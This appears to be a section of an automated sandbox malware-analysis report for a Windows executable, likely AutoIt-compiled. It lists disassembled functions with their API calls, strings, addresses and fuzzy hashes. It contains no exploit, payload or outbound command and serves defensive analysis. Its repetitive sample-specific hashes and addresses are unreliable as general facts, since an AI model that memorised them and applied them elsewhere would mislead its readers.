            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
            • String ID: (
            • API String ID: 2598888154-3887548279
            • Opcode ID: 954bd4459e99c09004175a5489dadc5609f9e67819c9dbc66d99e1bcdabd6c25
            • Instruction ID: f3ad1452a236cb526de10bb4083fcc8dcfc6cc1693e1de35eb15ec95c224fae7
            • Opcode Fuzzy Hash: 954bd4459e99c09004175a5489dadc5609f9e67819c9dbc66d99e1bcdabd6c25
            • Instruction Fuzzy Hash: EE611376D00219EFDF15CFE4C984AAEBBB9FF48300F20842AE995A7210D335A940CF60
            Function 00FDDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • ___free_lconv_mon.LIBCMT ref: 00FDDAA1
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD659
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD66B
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD67D
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD68F
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6A1
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6B3
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6C5
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6D7
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6E9
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6FB
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD70D
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD71F
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD731
            • _free.LIBCMT ref: 00FDDA96
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FDDAB8
            • _free.LIBCMT ref: 00FDDACD
            • _free.LIBCMT ref: 00FDDAD8
            • _free.LIBCMT ref: 00FDDAFA
            • _free.LIBCMT ref: 00FDDB0D
            • _free.LIBCMT ref: 00FDDB1B
            • _free.LIBCMT ref: 00FDDB26
            • _free.LIBCMT ref: 00FDDB5E
            • _free.LIBCMT ref: 00FDDB65
            • _free.LIBCMT ref: 00FDDB82
            • _free.LIBCMT ref: 00FDDB9A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
            • String ID:
            • API String ID: 161543041-0
            • Opcode ID: 0245d6ff0d2003c8a5f752ab426f28e525b08a4a9deed23f8ada14e7593c6f55
            • Instruction ID: 52d1ab32420ada811f121664616dec54a3351e9a0b917f84f6c61b813d05c1b2
            • Opcode Fuzzy Hash: 0245d6ff0d2003c8a5f752ab426f28e525b08a4a9deed23f8ada14e7593c6f55
            • Instruction Fuzzy Hash: B6315C31A046049FEB61AA38EC45B5A77EAFF50324F19441BE449D7392DB38AC40B761
            Function 0100365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
            Download Yara Rule
            APIs
            • GetClassNameW.USER32(?,?,00000100), ref: 0100369C
            • _wcslen.LIBCMT ref: 010036A7
            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 01003797
            • GetClassNameW.USER32(?,?,00000400), ref: 0100380C
            • GetDlgCtrlID.USER32(?), ref: 0100385D
            • GetWindowRect.USER32(?,?), ref: 01003882
            • GetParent.USER32(?), ref: 010038A0
            • ScreenToClient.USER32(00000000), ref: 010038A7
            • GetClassNameW.USER32(?,?,00000100), ref: 01003921
            • GetWindowTextW.USER32(?,?,00000400), ref: 0100395D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
            • String ID: %s%u
            • API String ID: 4010501982-679674701
            • Opcode ID: 1a0805f2e023b79e6cb1ad31989804afddad79d2532dca37bafc5d0700d6b5cc
            • Instruction ID: 66f7a119fe17731d3e202ebd390913d4a0230d7c9ee61298c162be5cc40a97ff
            • Opcode Fuzzy Hash: 1a0805f2e023b79e6cb1ad31989804afddad79d2532dca37bafc5d0700d6b5cc
            • Instruction Fuzzy Hash: 8691B071204706AFE71BDE28C885FAAF7E8FF48350F008569EAD9DA181DB34A545CB91
            Function 01004954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
            Download Yara Rule
            APIs
            • GetClassNameW.USER32(?,?,00000400), ref: 01004994
            • GetWindowTextW.USER32(?,?,00000400), ref: 010049DA
            • _wcslen.LIBCMT ref: 010049EB
            • CharUpperBuffW.USER32(?,00000000), ref: 010049F7
            • _wcsstr.LIBVCRUNTIME ref: 01004A2C
            • GetClassNameW.USER32(00000018,?,00000400), ref: 01004A64
            • GetWindowTextW.USER32(?,?,00000400), ref: 01004A9D
            • GetClassNameW.USER32(00000018,?,00000400), ref: 01004AE6
            • GetClassNameW.USER32(?,?,00000400), ref: 01004B20
            • GetWindowRect.USER32(?,?), ref: 01004B8B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
            • String ID: ThumbnailClass
            • API String ID: 1311036022-1241985126
            • Opcode ID: b778b5cc39cc5eab222dfbd8976fb3fa42d7a5138b1b5e3fd1443f080f58e9c5
            • Instruction ID: ea5b2d324a8615961172cf562eab0550ba457a5ed33aa1bbe58d8607c1018f2f
            • Opcode Fuzzy Hash: b778b5cc39cc5eab222dfbd8976fb3fa42d7a5138b1b5e3fd1443f080f58e9c5
            • Instruction Fuzzy Hash: C091B1710042069FFB16DE18C985FAA7BE8FF84314F0484A9EEC5DA0C6DB34E945CBA5
            Function 01038D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 01038D5A
            • GetFocus.USER32 ref: 01038D6A
            • GetDlgCtrlID.USER32(00000000), ref: 01038D75
            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 01038E1D
            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 01038ECF
            • GetMenuItemCount.USER32(?), ref: 01038EEC
            • GetMenuItemID.USER32(?,00000000), ref: 01038EFC
            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 01038F2E
            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 01038F70
            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01038FA1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
            • String ID: 0
            • API String ID: 1026556194-4108050209
            • Opcode ID: 9bd47d0493c2801ddb9256339d9a5e7e9239132f6a6d94b1dd6f90584cc2100b
            • Instruction ID: 116ee3e6221affa3337f65351d156dd66b29c566eebb61ac42a56395c9ab6a25
            • Opcode Fuzzy Hash: 9bd47d0493c2801ddb9256339d9a5e7e9239132f6a6d94b1dd6f90584cc2100b
            • Instruction Fuzzy Hash: 5C819D71508301AFE761DF28C884AAB7BEDFBC8354F044A9AFAC5A7281D775D900CB61
            Function 0102CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
            Download Yara Rule
            APIs
            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0102CC64
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0102CC8D
            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0102CD48
              • Part of subcall function 0102CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0102CCAA
              • Part of subcall function 0102CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0102CCBD
              • Part of subcall function 0102CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0102CCCF
              • Part of subcall function 0102CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0102CD05
              • Part of subcall function 0102CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0102CD28
            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0102CCF3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
            • String ID: RegDeleteKeyExW$advapi32.dll
            • API String ID: 2734957052-4033151799
            • Opcode ID: 96e1d07fb4f310b88399b45485f0625b7b5a2acb0857b9700aa88a5d947dc069
            • Instruction ID: 94c489b0b8af3826614ed6dd1749d4b7e3ba9b2b3888f88391cfbff69d628a78
            • Opcode Fuzzy Hash: 96e1d07fb4f310b88399b45485f0625b7b5a2acb0857b9700aa88a5d947dc069
            • Instruction Fuzzy Hash: F2318075901129BBF7319A65DE88EFFBFBCEF06640F0001A6F981E3104D7749A459BA0
            Function 01013D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
            Download Yara Rule
            APIs
            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01013D40
            • _wcslen.LIBCMT ref: 01013D6D
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 01013D9D
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 01013DBE
            • RemoveDirectoryW.KERNEL32(?), ref: 01013DCE
            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 01013E55
            • CloseHandle.KERNEL32(00000000), ref: 01013E60
            • CloseHandle.KERNEL32(00000000), ref: 01013E6B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
            • String ID: :$\$\??\%s
            • API String ID: 1149970189-3457252023
            • Opcode ID: 928d03d18d078e5f74d51cbcf02b9c9c5d975202d729bab5cd3c4ff22d620219
            • Instruction ID: f65bfe5ee302cce673aa0807ea2eddff6af0dc207d792805652addb5419dc4f8
            • Opcode Fuzzy Hash: 928d03d18d078e5f74d51cbcf02b9c9c5d975202d729bab5cd3c4ff22d620219
            • Instruction Fuzzy Hash: B331C8715001096BDB21AFA4DD49FEF37BCFF88710F5040B6F549E6054E77892448B64
            Function 0100E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
            Download Yara Rule
            APIs
            • timeGetTime.WINMM ref: 0100E6B4
              • Part of subcall function 00FBE551: timeGetTime.WINMM(?,?,0100E6D4), ref: 00FBE555
            • Sleep.KERNEL32(0000000A), ref: 0100E6E1
            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0100E705
            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0100E727
            • SetActiveWindow.USER32 ref: 0100E746
            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0100E754
            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0100E773
            • Sleep.KERNEL32(000000FA), ref: 0100E77E
            • IsWindow.USER32 ref: 0100E78A
            • EndDialog.USER32(00000000), ref: 0100E79B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
            • String ID: BUTTON
            • API String ID: 1194449130-3405671355
            • Opcode ID: 7991288ab44d22181f6f6956fe44695b5e79c7991035396d0680c3eb679f1787
            • Instruction ID: 58d66b42ef1ace4f71cab144184a5e86bfb2ef30cd47d1e2ce1b6305c76ad00a
            • Opcode Fuzzy Hash: 7991288ab44d22181f6f6956fe44695b5e79c7991035396d0680c3eb679f1787
            • Instruction Fuzzy Hash: A2218170600205AFFB226F24ED89A293BADF749349F144826F5C6F11C9DB7BAC109B25
            Function 0100E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0100EA5D
            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0100EA73
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100EA84
            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0100EA96
            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0100EAA7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: SendString$_wcslen
            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
            • API String ID: 2420728520-1007645807
            • Opcode ID: b29c4ab1449a4a2c8c8a741548940c1e0597ed102bbea523cb115960001959d5
            • Instruction ID: c7f397b0c19554048212ad22326fe30060d3fbd795ab8073b6a07c8fb553c81b
            • Opcode Fuzzy Hash: b29c4ab1449a4a2c8c8a741548940c1e0597ed102bbea523cb115960001959d5
            • Instruction Fuzzy Hash: 5311A371A5022979E721A7A6DC4ADFF7ABCEBC7B00F04083D7841A60D1EFA11945C5B1
            Function 00FB8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB8BE8,?,00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FB8FC5
            • DestroyWindow.USER32(?), ref: 00FB8C81
            • KillTimer.USER32(00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FB8D1B
            • DestroyAcceleratorTable.USER32(00000000), ref: 00FF6973
            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FF69A1
            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FF69B8
            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FB8BBA,00000000), ref: 00FF69D4
            • DeleteObject.GDI32(00000000), ref: 00FF69E6
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
            • String ID:
            • API String ID: 641708696-0
            • Opcode ID: afea97e86ed9b63f6e728c59b30457abf453cc43b47b6e5712cc4cbe685cb78c
            • Instruction ID: 2fb51ae88822da8588ff1df0fd0c80e1d3c1bd91374f95f1c8479c75c488dc21
            • Opcode Fuzzy Hash: afea97e86ed9b63f6e728c59b30457abf453cc43b47b6e5712cc4cbe685cb78c
            • Instruction Fuzzy Hash: FC61EEB1901605DFDB318F16CA48BB57BF9FF80362F144519E082A75A4CB7AA882EF50
            Function 00FB9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9944: GetWindowLongW.USER32(?,000000EB), ref: 00FB9952
            • GetSysColor.USER32(0000000F), ref: 00FB9862
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ColorLongWindow
            • String ID:
            • API String ID: 259745315-0
            • Opcode ID: cd023184bf785b5d1fa54c408cd7c72d1abd5f95018c72e1e1a1c2131ed3bf02
            • Instruction ID: 1d697ac8c6c7b5739637615b8aa0765c10ffbd5545905df8cf3105429801436e
            • Opcode Fuzzy Hash: cd023184bf785b5d1fa54c408cd7c72d1abd5f95018c72e1e1a1c2131ed3bf02
            • Instruction Fuzzy Hash: 12419231508644AFEB315F399884BF93B79AB06330F584616FAA2971E5C775DC41FB10
            Function 010096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00FEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 01009717
            • LoadStringW.USER32(00000000,?,00FEF7F8,00000001), ref: 01009720
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00FEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 01009742
            • LoadStringW.USER32(00000000,?,00FEF7F8,00000001), ref: 01009745
            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 01009866
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HandleLoadModuleString$Message_wcslen
            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
            • API String ID: 747408836-2268648507
            • Opcode ID: d603b556bce80157f4d9d95149b9d15599cfc4e6fbd5c968d5d9455fdf02395b
            • Instruction ID: c9e01216a85655471edaed6439ea6082b4777bccf927c7e45df2d75f2bf8f110
            • Opcode Fuzzy Hash: d603b556bce80157f4d9d95149b9d15599cfc4e6fbd5c968d5d9455fdf02395b
            • Instruction Fuzzy Hash: 6F417FB2804219AADF05EBE1CE42DEE777CAF55344F504025F205B2092EF796F48DB61
            Function 010006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010007A2
            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010007BE
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010007DA
            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01000804
            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0100082C
            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01000837
            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0100083C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
            • API String ID: 323675364-22481851
            • Opcode ID: 3d179f9f9999437ce0d2801c2fc526070b8c6b33f06d79bd456767f4579e8642
            • Instruction ID: 60e98cf77fdd39be993db5df0d2b6f547241b89f4be51aa26920659c48088529
            • Opcode Fuzzy Hash: 3d179f9f9999437ce0d2801c2fc526070b8c6b33f06d79bd456767f4579e8642
            • Instruction Fuzzy Hash: F44129B2C10229ABDF21EBA4DC85DEDB7B8BF05390F444169F941B3191EB385A04DBA0
            Function 01023C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
            Download Yara Rule
            APIs
            • VariantInit.OLEAUT32(?), ref: 01023C5C
            • CoInitialize.OLE32(00000000), ref: 01023C8A
            • CoUninitialize.OLE32 ref: 01023C94
            • _wcslen.LIBCMT ref: 01023D2D
            • GetRunningObjectTable.OLE32(00000000,?), ref: 01023DB1
            • SetErrorMode.KERNEL32(00000001,00000029), ref: 01023ED5
            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 01023F0E
            • CoGetObject.OLE32(?,00000000,0103FB98,?), ref: 01023F2D
            • SetErrorMode.KERNEL32(00000000), ref: 01023F40
            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01023FC4
            • VariantClear.OLEAUT32(?), ref: 01023FD8
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
